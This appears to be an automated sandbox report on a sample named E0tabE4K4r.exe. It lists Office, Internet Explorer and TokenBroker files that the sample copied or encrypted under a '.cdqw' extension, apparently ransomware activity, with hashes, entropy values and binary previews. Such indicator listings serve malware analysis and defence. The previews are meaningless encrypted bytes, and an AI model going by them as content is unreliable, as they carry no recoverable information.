                                                                                                                                                  SHA1:77D392BF40FA8F0B65AC8790041D894D6AAECE65
                                                                                                                                                  SHA-256:5E6F08B84311D6BA7C91A0D05EABBBF4801B63E2C72BBFEA61B4BCEDC72200FF
                                                                                                                                                  SHA-512:19903EEE5BF2D0F9564A2C201812AF7F55BC070DB5735EC52EA34DC9888564176D7E776B2151043D29D13E94D656ACAB4C622740041C2F794AB33610ADEEDDF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:10/05.3p..@.h.y1.A....t.D.5..(M.......F.^M...|C.I21..L.5.X.n....fO\.G..{hBx4>Q.....Q.G.SS...4Y.p..~..%..nn~..l..R.e2?...^N...ef....].8.OZ.l.u.).Q.6k..1u$zt....-*...#........uqvAk.'.0..u...L.MX\X.m..r@.`.tQ.5~$.....+.u`;..:....Sg.7ko.nUG.c.@V.l......>..'.....s..,.......3.D....N..0.S.....5D.S.tf..H.G.x.C..%... .g.m.t].t]......P...|...(.RH{..oEk....z.RN.q.....Ox.Q..G......tpW?@gw.=..........|h........4S(Z2..k%.Ev.p..,E&..9.$..[...^.+.a...{.w..n..P3H. BmF..k.I.A8...8....%\.t{.)|..~.....s2..P..........6.................N.....P..._Yri.j@.K0i..QE..(.....X-(....H57........p.}...d.7S,(dJb...i.....!6.e..{n.=....mC?.M.G..m".:...3.C.Z\....r............w.n.OD...Tw(.x...@.....d..c....J.9..L...>$L...1...."#.......b,lH.....R...v#.&O.I..I......|..9e..@...Hh%^..^..Vw.Ld".xo>..`D$....*$.!.L.V"x:.J....7FC.......e.....O.,X+0..n.P2_...Q.Q....b.P..(.=.....x2.^.E.928X...\...<./...S......y.t..\._..%.s..].^.r.Mx.M.Kv..!..w..7R..^..=V...]c..U.....t4_.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):834
                                                                                                                                                  Entropy (8bit):7.734278883985571
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:QrfL2x1c2WZNjY8T0etaDyiZPBXcwH1SAxaKUV4iRiUQZHjOKx/jaHj+hsZNg5l2:QzLU1c5lNF61raPeEQ1jOmyj+FeE2bD
                                                                                                                                                  MD5:7D0BE53517F83E24C5A7691C65FE11C2
                                                                                                                                                  SHA1:212A9CD2D44C7D5BB225F9D5728C38FF6EB683D4
                                                                                                                                                  SHA-256:3BC95D10C64A368AE934BF0E5A45CF863073C3FA3E0375A2F2428586EC376F8F
                                                                                                                                                  SHA-512:88BCE9A7FB4425EF6C925DC8F8D15F5AEFBE6FE100CE9BD09F953ED757ECCA168A8C507AE2D2CB62DE962CCDCC7254860737C32D807E791D37E443C60354D4DC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..1.0...A.....w.1...5.._.,...[..Y.^ .-.....Q.._..S.$....h.Lp....d.M....H.1^|....L.+6._5..s\....1!E1.8X.&:.i]W....".w....(;y..|...2..il%.............P.~7.JWR.G......+m". ..D..L.b.#..>S.^.J..h.!.....6...4...e.WG`K.......]I.K...T.....HS...Jkt.h.(...l..r....Oc).S....f..-wF...,.~!)....3Ms4.4S...3n..p#5.W....:..g.i...S..f,...dS...z..,.w.se.4...n....f_...i......0.d.U..O..+.... .g.&...C*85 .!;>.j..>..GZg....O.TR...k..R>zm,.....(;.L.+.n=......h.....Tz]n....@.......r_z......../..f.."..P..b.'...zU6..C..;.%g.Ic..F6......O......qy_....M..6..Q...u..X......e3..KP~....&5)./v....z.=....... ...$...\....y.9.W+$g.x.=S......>.Z.a.S.,..PNVi%.h..e.....g(p._"..?).W`.n.3.. .*..lwo04i..X.9....~A.3T/.m.U..E.... .N~[t....FG$....74....o.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (870), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1742
                                                                                                                                                  Entropy (8bit):7.890468427856481
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:6LornCUELudYTYmuN1dUZXDaMDQgXlVB24izQ4DD:6ErnenTYmk10za0QgP4P
                                                                                                                                                  MD5:4B1AEC21BC89F7E41FA9C40A802CC518
                                                                                                                                                  SHA1:A1D5D2C5EB72A9E68521A493A8FC0B0193C48393
                                                                                                                                                  SHA-256:AFBA3941B76EBAD783EBD87D0A585B294DE9A787BB3618A41943F2B6956516BA
                                                                                                                                                  SHA-512:2D34979B8D1B9B22AA63FF38D11D67CFFDACE34A28EDE497BE16833BB1F0C6E5B759D35F66038ABDA4A744E76236BFE8264143AA9DB30BC2F2F4DD548468EC8A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..1.0....W..q.........`.q.}..9.}...5..377T........NW...,.~..R.+.).].}b..1{....8.C.?..Z.sI.N..R/q.cQ......(....6G.cF.N...}..|.^.o./)c[....mz.%*..L.*...K.~....J....s.j.d..+[..'.O.hAH.h."..ri>n|..a.,.jW.X...]`.......+-b....]u.K..?..E......x.J.1..W...{.#.....6......!BNd.]..,T......;b.Jy..n.B..s..}H8h0._...........e..Y...:....0I..h(-..Rny.^....J lc".PDv.q.dA..R..d.{".........;P.......|y>..8.}..u...@.A.......m..Q.....W+.8X....K..........]D...os.......P....SJr....;...W...k...d..i.:.Y.*b.blW.R.....SM.W.%........`$.2....3g.l../9...%..Qj...Fx-..P...M>..Gr.#..6-.`.;.17.Mx..S.Z.&..9pL.9.....{WJ...e...2...L..{...|........j.....u....=.&.2.....<^.R.#...-....+.R..k....q.+.-...q.p...d&....!.._.Kn.A..*.M.........{..5Z..~..#.v.~.......}.jTQ.......... .t.'V.}.e...t..(.2H.,q.^.7.2..u...V] ..I....L.N..F.......kJx.t..(..O..L..R.Y4.}..e...'.....S...hK...xC^..\....$......(KT........../[.d..]onL.;. G7..6.XF.%.P..s....s=<n...3I...6.'.4.yfd.....v.xooAb.i..8.u.b6..-

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1062891
                                                                                                                                                  Entropy (8bit):5.53011511803427
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:lFklFcwfMZJMyXSZlV0N8x5thr291gess3TylunX8:lOYaMZA
                                                                                                                                                  MD5:4CE43BED65D4A29C63AAFF0116EFA687
                                                                                                                                                  SHA1:F714E181310FC1B0B4375E6209379F3688C62461
                                                                                                                                                  SHA-256:707D22E15A865E79FD5EBE0DE7ACFD79C44D1ACCB77A0888F8C3D08F24D8AB97
                                                                                                                                                  SHA-512:2C1FE4AE8D63EB4C5089C2D5EC2354590BDAC2D1B869432AC055DEB9EA70F5A66CB0ECACAAE6CE73EFF97108AB8B5B07BBB83FCB613878FCE180868516934075
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<Rule.\......iw...-.`.e. .....=.|$uN....!.S.}..........)On:7.a..9.8<...R.J..S.K..d...Cm..-<.w.8..O................x..X..3.gO.KE@.0.....u.\3..>V...9.Y...g.MsZ......%TW....8j.V.5$..._mv4K....s&.\c...|......\..6..\9....6...a..... ....U%.,.. .y}....*R.-5a.....9....6.......vm}.G..Km|lL....l..^.H.%.RE...N..6......\k..@V.h..@....\d...=1g.;+....?.1juQ.W.'1.o].wh>43&+.z..".....5,.........`Q.......p.-..\....>r....{.7...v.Yn..U....Gg.w..I.....RA..@..O.rD..2..H.~.G...n..s.....|4..?..}...dyB.c......@..H...F..iu.U6..{..h..'....P...G..u.............."..%iq...(....<.,@P.^].<..P.8.....b..L]..!.......LF.j@.j.....:..&..bbYM.Yv^r.(....9OX......}..z...,..99V.B.B-...a......~U.jy..`....,..Rk8.D.....p.'.V...6..yVuDS.U.;.d.~..9.9..>C$.4P.Eo.!F..|..;Z..u...D..>.xfZ..1....&.$O..R.......OY.../.t.....d.}....X.K......H.8{.H..zB&h...$.t8.......&....'...*.;G..-#..U..U.W.2.......l.. qw...4..w......K.>!P...6.Z.E..x'.|J.....5.!...d^..]..2Y..*..[.....;.8...E.).J.E.A...Yk..[.g|...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):320676
                                                                                                                                                  Entropy (8bit):6.634549237457301
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:4308Xss2cnDfumf6lyGZGAbdVUeEByIp1unb6MYtDMpdSn4X:43r2cnjrfDGZGAZixXpwjYtDMp8na
                                                                                                                                                  MD5:80C22C3A918A1FBA7A214B402C934854
                                                                                                                                                  SHA1:809F8A73C4DA6BC9675C9ED993AFE5285484034B
                                                                                                                                                  SHA-256:D92188884E9CBA992598AFE709F265B60C77E82FF2F5EB40167B8D9D96C3ED13
                                                                                                                                                  SHA-512:65D278C90022D9AAA8C57F1E66013C296DE832407764C3B23284A759EC87A3EDB49F653513406422501D1E9D39F0E95C7F4F797586D98BF6B5ED504951964516
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<Rule..>_.x.p..%..C.e[.W...<G..h..C.`'.z....!#_...1).,......c..i.3......[..D..q...\...J&..P1.+..q.b..0.1`.x.."UL.F._IW..!..A...&..(?.... .....K..I.?....Dtb.c...V:...b.K...&..-..:q......:q.P.?...\.:"..X...O\.."_.dI..80.........../A..=@[m.......LQ..M.hO...d...(Q-r......z.q.........Z.m..r....9S..ZP..r. |.....D...:.q7O|........(.1.....M......Gn.%+...T..\.P.o*.L.X].p0..eo....@k/.)..*,..I..!.0.+..Jq`.K..d..?.p...k....0..E/..okX.R.Tj.`.4......w..A.n]...*..kV...&.z..o.."..+71...a..G.(34%..........H...w.o\.?..VF)...6."..bA...k.#.....*.&Qn.U..`.Sq0.K..../.D.......N.......~[.nS..........2NF..i....c<G.......2........3......ti>....:X..5..X.u.D&.......9.g.....>|..+........?tMS..%..6.r...r...f.Nja`..J....^..N...{+..r.S.....0.VKG.8|R...Q.vB.`.......\P....u.u@.Q..A$....6`..#.7.).GcP.._....6...*.+L.'.._!`H..z........x.....l.r..bZ....[.Y.......Hnk........n...9=8.$.x..J.>....sb..a...`.vC..^...P3.Nw"O.H.7..@1.7....\/../......xg/8..;........

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\16.0\officesetup.exe_Rules.xml.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):361051
                                                                                                                                                  Entropy (8bit):6.515224564721948
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:DEUDO2/S6n/3Siqh+5uEE9kaLa3S6yplg+NHI3pu8OZ42m1qDmvGLY+UemyDSu:RDgOKi0+5u5ze3gvoZw4B1wkWZL
                                                                                                                                                  MD5:5888625AD196CA7A564FD0A2D516D9FE
                                                                                                                                                  SHA1:4261705351BC43C3AE844006579C7B45D8384F59
                                                                                                                                                  SHA-256:7BD05482A76D5DBE0F322F46DB9936B400E42BBFE3E1F1310413A4C612969112
                                                                                                                                                  SHA-512:7C57BA500A22C2FDE0A744B46C44D9C3D81971D1145DF80DC5885DB523929B92D4E7EF3CA6FCAE0531E606AEDE00D6B0CC80BBFE37B3CBB2CF95D566D040737D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<Rule.M..z....J;.D.yt.C.N..[..o=....T~R..S[q...A....r.B.....U.....[.3."...*.%.K.Owt...j...G...(.?mc.[!....q.E.X.Fho..2.w....4p.N.n.w_...<.U..].^`|.....1.....;...=.x7+aN~..........s.9.&{./...+L..%z..mwk.I|.G%-ZoF..mX?...R?..z.pS.s}.#.....r..U..d1.Oh%....l...%6&M%..\r.&T...J..l....+...YX.`......p...."........ ..d....3.]..-{=...g...M.[Y..#..q......4K.<.<.'Gj.~jdq..j..l..R2.c..T....pl.a.......7..-.s..i...-..^..B.=tI..!#.~Z2j.<..F.........+&E.*......7u..|...ED..I........S.hW.%h.<)$...7.....`)4..cMR$..}{q...B...^W.P..'...4.K'.....X..c.~....KTS..p..H.1j..9#J[4.*z..qm..0.&.$7c.Ew.;..?./......i..g..R..$...W......9(.C..}..%e.m.X.....n:P..&..s....\..../.~..h.IJ.c....C4.M2lM.wY+..u.F.[gg.r....Fy....|u.G@e.tTI...9.O...........*...j7...6...}..1.j.....]c..e.........N..+..).mI..0_|.NdB..4`+t..zf.(...(..T......A3.u.p.c$...U...Jd...9k{.|.Q0.......j....J..s7....%?^....B...A3qA.yr.E......I.!...#....<.=Gk.........bjS..LGp.@2Y...K...<.5.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\Features\1-7FeatureCache.txt.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1154
                                                                                                                                                  Entropy (8bit):7.8519474068198765
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:M8bwfVjplLOj7XONyhvf900chgTzUxkS9RdKfHrs+BghtIhkArw9pHo2+2bD:M8applLMDONyhvl00chIUxkS9RdGRB8x
                                                                                                                                                  MD5:61332F592157DE21F9824C39069F0D18
                                                                                                                                                  SHA1:6AA0B342CB37B98B657ECF17BCBA71D71E8405E3
                                                                                                                                                  SHA-256:F5648901AE85CAB28D3052732F84B8298382AE485CEE9B0EE21E4A0B26542EF8
                                                                                                                                                  SHA-512:1EFD00252E49B1985A4E415B19683CFDD45928248945A7424CEBF634E3EE50FEF0B37AFBC87BCDC8C768990EB6984B13E3545642CE8D759DAB1C467C43E885EA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:3.7.4..e.r..wx-G..c....!z..C}...J.}.q:..G......`.aF.......E.F#vmY.@V..O...[........).....2B-.s............#.o.,..O...#.\s....0..G*....T(...R.;K..+...9.M.... ...!......?,_...N+.)C.:(;.4....cEwb..O.o.Fl".......ei..4... ...........%\...v.....^...........q...h....[.6.|.,W...K....91.).y...bp.;L.....H#.9.*Y.03...)......7...X;9.J..s\X...;N..\..l..<d..B..{...~.>yz0.Sg.,...)..9Z..iVp..3...'..r....1..{S.........:..L.=....zQ?x.`D......DN...zf.>.........QU....'..W..i.........a5....Z.<R;Lh!B@...7?.[G..nh....U.C...kK$.~.3Z....NY.#......Ms.6............L..9.S..{#.._d..d..b.........D../.......3.b.....e..N..j~W...Z...=..E...|O5...c.H.%......Z<.....iP)..H..-.\.......'...i:...A.j..i..o..0..t.......L$)v(4.ig.~.|M0.LVb-Q..)...6.V[..r...m...........t.s..z..e.%7.2.M...3X..(.8.$(.;3J.bg...........|2...5.;...M..YY..n....E.Iv...,..*....\.:..k.&T.C@73..]..2T..<./....|....-...*..(.......[..D..~.w.Wh.'.mH0d..\.x.B..RR. .I(..:`....,.d.pt..D./I.s,.'%..K`..

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.992143345077302
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:/hJ9w10LDvw49FczK0muU6Ipjcygzbt/oCBc:pQ0HhFcm01U6+jcbzbs
                                                                                                                                                  MD5:57478CE0ECCE8ACBA9CC7FB48F30F419
                                                                                                                                                  SHA1:64AD75E98B8DC8A485F7B96F8A9EFD9C474F7B80
                                                                                                                                                  SHA-256:BCD24C8C1CDD2992544707064187D8113EB34499202E41C2E26EAFC5822E50FF
                                                                                                                                                  SHA-512:DD474A98690C724EDE4A2E783A10306F63213D02D4535FFB09397A71EF9A073872C8B8272EAE12CE48F4D55BB69EDDCA33404298C5061EC5B9FFF73019F9E498
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit..].?.+L}...$.k.Njuvo<...x....th..z.2..<ja..ZFv.X.U..B.)..e ..YH...]..ta[&..X.....E.$.I9...,\..=.i..]...+......tG....o.......o..@..8.^Wz..q8V...{....2..Uu......3...a.+X.........d.....,.R.k.-{...Y^z...=.L..w..lv,..7. j..[LGmSW..'..7|S..W..C..d....l.7.....$.V-P...\6x..^.../.TP.d..q...,.ph*..!...v..T...bA9@...:u.t.E0.....0..L-.\.n.....ku).......8."...x......f.).+_N.8...........4.vR .0.1.K.>...o....^Qk:.+.(.....tW....2....I.0.U8.._.8.i%mX.#..i...C..N......n..z~..}uYW.H..a.<...<.A)..qj.s..b./.&9@%..+z.....y........ .,.G.sm.t.o=.C.....jG#...y..m....<.J&..`...?...<v.......`...O.....$..%5|.Lijn..O.]+.y.w..=.....b../S....HT......n5^.>/.......d..Y...&......C.`....[......)?.U.*cW...>..`....N..In.b.V.%...z.s.!-.+..`CX\R~_CN.2...A.6...O\...4..WU.:.l*.............L.1...r.N.tj1...h.'.$.b.c.4.e.C....GS.t....^.Y...t.fK4?.d.....e.V..1.:R.......?&.g.Gwf.X.8.9.j..t:..Z..3.V...?w9....."...+........i......}.... S....\[(..e.w ........Tn.....Hq..3.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.991112276491091
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:mwwofOvH/3Y/NX8ZaXqTD3iFK57SLPkkhsTVkW:L1OvQ/VQcgGhs+W
                                                                                                                                                  MD5:7C90E71EF1BF08E3C4BB90E5CE7066A8
                                                                                                                                                  SHA1:C10BDC2CEBE4AE2B9122F656FEB566E45EE6E32A
                                                                                                                                                  SHA-256:D99E8C3B8C0A884442700E78989A23107EC688E70236EE8DBE9E9D6F017A1660
                                                                                                                                                  SHA-512:7FBCED1496AFDDB46870A26F7642ABE1E48DD5644B74DD23C38AC017E5EC162F599015C35D3940058FDC935FD3560682824DCADFD91806897E361058ACAEFE13
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitr...>)H'.v.kr....k.1Ky..mU.(g..$..I..s=.4.:...F.P....Z...b.~..k.'o....EIh/.'.$,..K.i,'S......m..6qL&.m.0/....z.........{C...'..b.......8.....|.]e...L..P..L.3O..........q.._N.......1s1E....v.#........Bgjk..bt...g...E.. )_.p..(....1..I7.Ouz....S....}..|_...H#...xg...P!.q0:..Q....H..h....~b.-..!..0.H..k.{..v...t.U$b...!.....l.Xe.....X...\..^g...A_...&.c.6.d.>.).%,=.Y.t..M...p....7...\..%|].6.DW...M}.%..8&.3R..j...?tF..C.QT%.V...v..vHn..."...o.2..]....{>...j...}..\,.&-W$-......./...|.>....A.$b...^.W.a.F....|.x...c.B......d.~}f..1....1]....W..<...Y....".C,.z.bu....U.s.e.....v...+.h...c ..8.'.@..b...L.'...%q.t..:...p.....R\..W..K.BJ.,..'....,...`..j.Y.u".L......o.....(..%.(p[...@x..l....QG...R.1......Q.S.d9J.k;......g......I..9..T.0........5...D./T{|).(O.P.6&}..i$.........+.....Z$T5.A.Qe....Z./y..o..u....U....D......@...~....Y...C...*GT=G.o..N}...N.".............I.....y8Tmr......IDP..s..b.a..../.:.`..H5z"N<U..z..)SR@T.P.s`....=.Z...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.993082734529845
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:QoiryHtvHo3tCeI9HXqz+1vmE612+VehIt2tHsWEQ8g4MA+5fVKG0eLnfQC+qoT:QoiryHpHeW6SLvZhr4MAcrHnfQwoT
                                                                                                                                                  MD5:D58CF4792FAE8660968329B5CDCAB892
                                                                                                                                                  SHA1:97284DD657467B70CDC387539C94D785C4192D59
                                                                                                                                                  SHA-256:0ED5F412EE14BE9751035A7EA1D7B61862DB7C4437CBB165AF9AD704395839CC
                                                                                                                                                  SHA-512:68F7B030AE002A00F4BE9751FF964B7EDC24627F68C63EECD91D3C33EF46850C5CEFCC3FD37990A4A69CA52BC8E9E9B1A2D152E845BBE21E4918D5E579561320
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitn.u.|.^AO.;`.!^M[..<...=.;.......7....P.O.B...:..2.}o.'W......I.9Z.........=..nK1r......N.lZ.W&.uw+<..H.f.=._s.c .a.c.#..L...|=.j...f.+.#..H.3.p.......-.8..C..T.."..j..i..5s.....*...]..#...q........o..3%..'....y.....}..a'/..9.Y....."..6!89,..2.c_nF.-..u}....~............{.f.0t.N.Oql....wb...&D...l...,.......n4.....Q.:...c7V...F.L......B4..@O...u.....6.|...!.<...Y.R...n..\X.E..U.n....=o..,...y...2!...>i8k.......{.J.~..RG..._.r49.<..a. .R...B.y...#.*...|..{.%=...}..,.`D.Aj8..gK.G..w...[(...".|..Mb.:W.........G...!\........&.........FoU.&.>:..MA.h%%...h......_8...0../s....A.sR.._Q.mg)..*...!;a./Y..|.S.dw..N.s......4.y..UL.`...it.?.q.A9.^....H%b;yt.%.'.:...Ye.^.#.....6....#.....v.Ly.".....wo2.9[.........A("... ..?@.....jo..'.."...D.Z...........{...3....Q.B.d5F....a..c.p..w.[.....Mj@..@:.+.1#.v... ....p..=PZ.%.2......$...e,w..!..f.@.o.nh.w......{.{...qK.....g[.l-)1!...d!.=..\@...M...../sp....'..X.|/.......J30n.......J.5x+V|7...w.R.'/..{...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24910
                                                                                                                                                  Entropy (8bit):7.991588658553735
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:2uHEW8s+zQNYje14lCPsl2ScrO8Pzn8Cl94Uz42hzjD7efrZ7/d4wpFBLN0nn4tS:2M/GQN0F2jJ1l9/zvpXolFPTNonF
                                                                                                                                                  MD5:EBCCFF309BB4D722BD4BE0803FC9F979
                                                                                                                                                  SHA1:12373B7F2EB2B4A6235DC325C9D37F273388ACE6
                                                                                                                                                  SHA-256:E4C9D1DA1874FC5194CA1D342AD1A25032CDE46C330EC225EC017C670E09B5CF
                                                                                                                                                  SHA-512:933260D1D4F84940CD235C322B2E1047F580463D9F11E25995B1F7F45D69C678F61707513B82A40187974978855DA60E75A98E307E97E0F55435852184129AC3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitS.R..\....._5.d......Ia_.M..)M...........\....F....h=.d....U..,.n?..!,#..8..$...;..y.c$.\.a.Q...jFZ.X....j6(...Kw../Y.+...C..T|.......:^^v.."l2..}..4..RDC...#Cz..hyQ#.x...F..'% .b.....V.6x.2/5O.S...@..],_.0U....e..L....e.....+...[G.j...8=RB.k8s...!....-......a%F.l....e.f8...bc<....z_.q...J...."u..............'%.' ..{v[..O.4...3...f%0.J.%oo.d...l^}ZR.7g.....3.[. .o..}X.@.yn!..(.I|%..{N.....N..H.a..|.~...'.%o...J.^x!...x,.?...W........A.V....K.z..~}*._.....]S$|.....7.#xK...}w.......?...u@.=K..Pd.j...Y`..0R.....t.3.m:.`K.....XWQB.&:.6...)..S..Q.K_.~)..p[..RO..S..n.*..|...3X..*..Bc.......B<{.N>.@..... ..rAI.vE...]7..Sw>.|....W...iN...1...!..LN"...e...B...c7...&......;fw.K-f..V.z.[bi..n.j..... .&. w.j...k.a[N9JA.....34...v#.r?..~.wJ.........G.J....'.p6Pp,b,.?./.Z..T.i."..........*.X..f...M.Kf%.....s*.M7i..R..M2U.-P.k.-M.<.....42...[.{.g.....T.g..s.~6t...1..'.....IOC....U.......(...~....}pF.v(.c1.AS............B..w..RwJ*E.n.A.R/

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1356
                                                                                                                                                  Entropy (8bit):7.811864908425626
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:YOAkbSi3UmUUnYIxZIi5xRu7WGMXPizUva185SHVv5uEo9DOhe4z+CSA2bD:Y5yUmxY8lxc7uUUy1cSHV9FhZKCED
                                                                                                                                                  MD5:4DCD2645214F59E7136DCD430691487D
                                                                                                                                                  SHA1:E2FC1ED92D0B389B990E783EDFD4353B8BADBCFE
                                                                                                                                                  SHA-256:EE738A9603A0C9B01DED1CA2C4C1F0356D551C71C57EB6E58C60949578ED5681
                                                                                                                                                  SHA-512:D0EDF5FE1267FEE23C1105E1C6DD429663B9CA269C207092DA8E8DD059FCD6D1AA5DDB95E5E91743E71774C7F6EEEE362AEE82FF3BC1C81182381169E4FB399B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"Rec.......|K.....V.....F..H{q.gaO.?%@.."T..yG.i+q..U/Q...#2..f.6.....=.J4.._....1 ./.H.O.....j.."el..E.<...X...@.......s....c%.. m..8..Su...*......!.Q.}c.We..>..O. .-d...L...=.4.@N^.1...%5....+..G.A'....6..^.......-.Y.B.9CZ....H7E....!!...u>.....$.^Z...v......Pm.:.6Znjm.k..v.,.Jl].....e.".J].mTK.V......C.f.\..%..Wq.b@......O\NZ...~.C..aQ..A....D.H'.H..5U..9A.l...E'.m....X.".....ZL..N2.!..'/=H.JZ.r......,|..*...B....H... .L..N,.V/P.2..O........q..}......T........]..o.;oI'[..V..F.M.WU......[..kp.W...h.....J..^...s.\2.*CP...1.....a.y...F...`...-../.....E....y.x..M...h.l...k...@.....qB.Z.dCp.u.4.....7.{..z.5.`../......H.]2.E..'.BL.y.....4.G..N........_R..9.E.a.8.-'..y.t.X.Q.c8.*.......gT.._2.qB.96.0.J...7..K..2S...TK..S..!.a.q^`^.e..\...4\M"m..Ie.......l...#..3,sz2...mk.....1....p+kmQ..r..{.l.......u-.... z.]..8.a.`..Ll0....'.).......H-.>..f.w,^O..|..0..,.......8......GnwHB.....&..'.Lg.m.qXO)K-.1...sM.KXo....e...U.99]..

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.9212126833238905
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:KZHoCBXiOQp3glpYuu0svDN6UtJpvvB0TnM+GK3Jv2PPPXWEnuSitAD:uHoC5inpQlGuu0sB685vBqMC3KPPXpnH
                                                                                                                                                  MD5:A9CF0AD454FCC9F01A7AACFA24669AE1
                                                                                                                                                  SHA1:2F2BE48768759DDBDF6844BFFEDE5D70E044A27A
                                                                                                                                                  SHA-256:04B2B0F725B337FAD8A281773EB7AAC7A2775DCE0079E057EF80D0ABE95E39A8
                                                                                                                                                  SHA-512:6BBCDC2A62A01D591F274277F46F78B4BA7B5603F947BA7C331BCB4340D29B41513CA696AE277B6F0CBAA8A490E08AD5744A0E537056303B1BC06282864837E4
                                                                                                                                                  Malicious:false
